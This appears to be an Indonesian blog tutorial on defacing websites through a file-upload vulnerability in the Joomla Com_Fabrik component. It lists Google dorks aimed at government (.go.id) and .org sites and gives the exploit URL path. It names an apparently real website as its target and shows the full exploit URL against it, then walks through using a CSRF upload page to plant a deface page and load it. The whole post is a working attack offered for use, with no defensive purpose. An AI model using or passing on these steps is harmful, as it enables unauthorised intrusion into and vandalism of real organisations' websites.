cara Deface Com_Fabrik karena sudah lama tidak update blog di karenakan admin sibuk
Dork:
- inurl:/com_fabrik site:go.id
- inurl:/com_fabrik site:org
- inurl:index.php?Option=Com_Fabrik
Dork Bisa Kalian Kembangin Sendiri
Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Link CSRF
1. Dorking Di Google
2. Karena Di Sini Saya Sudah Mendapatkan Target
Yaitu :
http://www.zambianacmisonline.org/
3. Masukin Exploit Di Belakang Target..
http://www.zambianacmisonline.org//index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
4. Jika Vuln Maka Akan Muncul Tulisan {"filepath":null,"uri":null}
5. Buka CSRF Nya Dan Edit Di Url Web Targetnya ( Yang Di Ganti http://target.coli//index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload ) Dan Ganti Dengan Web Vuln Kalian
6. Langsung Aj Kalian Klik Browser Dan Pilih Sc Deface Nya Lalu Klik Crootzz
7. Jika Sukses Maka Muncul Url Sc Deface Lu.. Target.com/scdefacelu.html
8. Cara manggil script deface kalian target.co.li/scdeface.html
Sekian tutorial yang saya bagikan Terima Kasih
0 Comments